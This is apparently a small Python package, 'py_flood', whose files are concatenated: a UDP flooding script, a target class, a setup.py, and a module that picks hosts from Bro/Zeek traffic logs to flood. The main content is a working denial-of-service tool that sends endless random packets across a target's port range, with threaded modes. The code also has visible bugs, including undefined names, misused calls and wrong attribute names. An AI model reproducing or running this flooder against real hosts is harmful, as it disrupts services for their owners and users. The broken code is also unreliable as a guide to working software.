#import socket
from socket import socket, AF_INET, SOCK_DGRAM
from random import _urandom
from sys import argv

from joblib import Parallel, delayed
from multiprocessing import Pool


def to_KB(B):
    return B/2**10

def udp_flood(ip, port_range, verbose = False):
    S = socket(AF_INET, SOCK_DGRAM)
    start = int(port_range[0])
    end = int(port_range[1])

    j = 1
    pkt_length = 1024
    while 1:
        try:
            pkt = _urandom(pkt_length)

            [S.sendto(pkt,(ip,start)) for start in range(start,end)]

            if verbose: print('Flooded ports %d - %d, %d times' % (start, end, j)) 
            else: continue
            j += 1 
        except KeyboardInterrupt:
            exit()

    return
def super_flood(ip, ports, threads):
    func = udp_flood(ipv4, ports, False) 
    Parallel(n_jobs = threads, prefer='threads')(delayed(func))

if __name__ == '__main__':
    try:
        ipv4 = argv[1]
        ports = argv[2].split('-')
        if len(argv) == 3: udp_flood(ipv4,ports,True)
        else: 
            threads = arg[3]
            super_flood(ipv4, ports, threads)

    except KeyboardInterrupt:
        print('pass in arguments as: <ip> <start_port> <end_port> <threads>')



from datetime import datetime

class Target:
    def __init__(self, ipv4, mac = '', manu = ''):

        self.ipv4 = ipv4
        self.mac = mac
        self.manu = manu
        self.ts = datetime.now()



import setuptools

with open('README.md', 'r') as fh:
    long_description = fh.read()

setuptools.setup(
    name = 'py_flood',
    version = '0.0.1',
    author = 'Dane Morgan',
    author_email = 'danemorgan91@gmail.com',
    description = 'udp port flooding, use a cli or just its modules. Integrates with Bro (Zeek) to flood hosts according to their traffic',
    long_description = long_description,
    long_description_content_type = 'text/markdown',
    url = 'https://github.com/deadlift1226/',
    install_requires = ['joblib', 'bat', 'multiprocessing',], #3rd party pip packages
    packages = setuptools.find_packages(),
    classifiers = [
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
    ],
)




from joblib import Parallel, delayed
from bat import bro_log_reader

from Target import Target


def find_traffic(log,flags):
    reader = bro_log_reader. BroLogReader(log)
    traffic = []
     
    for row in reader.readrows():
        for flag in flags:     
            if (flag) in (row['server_name'] or row['subject']):
                traffic.append({'ip':row['id.orig_h'],'port':row['id.orig_p']})

    return sorted(traffic, key= lambda k: k['ip'])

def sort_ips(sorted_traffic):
    ips = [] 
    for conn in sorted_traffic:
        if conn['ip'] not in ips:
            ips.append(conn['ip'])
    return ips

def make_targets(sorted_traffic, ip_list):
    targets = []
    ports = []

    for ip in ip_list:
        for conn in sorted_traffic:
            if ip == conn['ip']: ports.append(conn['port'])

        p_sorted = sorted(ports)
        T = Target(ip, [p_sorted[0],p_sorted[-1]])
        targets.append(T)

    return targets

def bro_dos(log, flags):
    conns = find_traffic(log,flags)
    ips = sort_ips(conns)
    targets = make_targets(conns, ips)

    for T in targets:
        func = udp_flood(T.ip, T.port, True)
        Parallel(n_jobs = 2, prefer = 'threads')(delayed(func))#for i in range(THREADS))

if __name__ == '__main__':
    log = argv[1]
    flags = argv[2].split[',']
    conns = find_traffic(log,flags)
    ips = sort_ips(conns)
    targets = make_targets(conns, ips)
    for T in targets:
        print('IP: ', T.ip)
        print('Port: ', T.port)
